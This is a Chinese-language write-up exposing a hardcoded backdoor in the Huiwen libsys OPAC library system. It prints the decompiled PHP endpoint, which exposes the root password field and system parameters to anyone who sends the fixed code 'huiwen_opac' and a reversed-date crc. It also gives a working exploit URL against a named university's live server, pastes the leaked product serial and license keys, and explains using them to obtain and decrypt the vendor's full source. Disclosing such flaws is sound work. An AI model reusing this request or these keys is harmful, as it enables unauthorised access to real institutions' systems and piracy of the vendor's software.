汇文opac图书馆后门导致源码泄漏

0x00 介绍

汇文的libsys图书馆opac系统是高校使用得比较多的系统,用户有厦大,南京大学,大连理工,南开大学等多所学校。系统使用的是Oracle+php,无法从公开触到获取源码。

0x01 获取代码

在汇文图书馆的官网上,可以下载到一些补丁,如截图所示。
下载OPAC重要安全BUG更新,可以看到一部分php文件,php使用了DeZend加密,可以使用工具解密,其中,/opac/ajax_libsys_view.php文件代码如下所示

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
<?php
/*********************/
/* */
/* Dezend for PHP5 */
/* NWS */
/* Nulled.WS */
/* */
/*********************/
require_once( "common.php" );
require_once( "../include/hwopacpwd.php" );
$pwd = $_REQUEST['code'];
$crc = $_REQUEST['crc'];
$date = strrev( date( "md" ) );
if ( $pwd != "huiwen_opac" || $date != $crc )
{
echo "ERROR";
return;
}
$ary = array( );
$strSql = " SELECT * from v\$version ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$mode = OCI_FETCHSTATEMENT_BY_ROW;
$version = $stmt->fetchall( $mode );
$i = 0;
for ( ; $i < count( $version ); ++$i )
{
$ary[] = array( "or" => $version[$i]['BANNER'] );
}
$strSql = "SELECT sys_para_code,sys_para_value FROM sys_comm_para where sys_para_code in ('01','02','14','16','17','24','47','98','99','ACS','RFID','THREE-M' ) order by 1 ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$mode = OCI_FETCHSTATEMENT_BY_ROW;
$para = $stmt->fetchall( $mode );
$i = 0;
for ( ; $i < count( $para ); ++$i )
{
$ary[] = array( trim( $para[$i]['SYS_PARA_CODE'] ) => str2utf8( $para[$i]['SYS_PARA_VALUE'] ) );
}
$strSql = "SELECT password FROM lib_worker where wkr_no='ROOT' ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$root = $stmt->fetch( );
$ary[] = array( "RT" => $root['PASSWORD'] );
$strSql = " select count(*) as cnt from marc ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$root = $stmt->fetch( );
$ary[] = array( "M" => $root['CNT'] );
$strSql = " select count(*) as cnt from indi_acct ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$root = $stmt->fetch( );
$ary[] = array( "I" => $root['CNT'] );
$strSql = " select count(*) as cnt from reader where redr_flag=1 ";
$stmt = $dbh->prepare( $strSql );
$stmt->execute( );
$root = $stmt->fetch( );
$ary[] = array( "R" => $root['CNT'] );
foreach ( $ary as $item )
{
print_r( $item );
echo "<br/>";
}
?>

可以看到,只要输入正确的code和crc即可执行if逻辑后面的一系列sql查询语句。
以厦门大学为例:http://opac.xmulib.org/opac/ajax_libsys_view.php?code=huiwen_opac&crc=8011
crc为月份日期按照倒序排列,例如今天是11月8日,则为1108倒序,即8011,结果如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
Array ( [or] => Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi )
Array ( [or] => PL/SQL Release 10.2.0.1.0 - Production )
Array ( [or] => CORE 10.2.0.1.0 Production )
Array ( [or] => TNS for Solaris: Version 10.2.0.1.0 - Production )
Array ( [or] => NLSRTL Version 10.2.0.1.0 - Production )
Array ( [01] => 厦门大学 )
Array ( [02] => http://210.34.4.28 )
Array ( [14] => XMU,235010 )
Array ( [16] => 7050-7901-9735-7268-7661-9231-6348 )
Array ( [17] => Enterprise )
Array ( [24] => 5048535745485245495545207195195197180243209167205188202233185221 )
Array ( [47] => 0 )
Array ( [98] => 3174-19803-0843-1589-15002 )
Array ( [99] => 5.5.10 )
Array ( [RFID] => 2640-011-913-785 )
Array ( [THREE-M] => 2640-011-913-785 )
Array ( [RT] => )
Array ( [M] => 2332777 )
Array ( [I] => 4495757 )
Array ( [R] => 85492 )

其中,7050-7901-9735-7268-7661-9231-6348即为产品序列号,可以去官网下载完整安装包。

安装,在hwweb下即为php源码,使用Dezend解密程序解密即可拿到所有源码

0x03 后续

这个漏洞属于官方后门无疑,拿到源码后,正在审计中。。。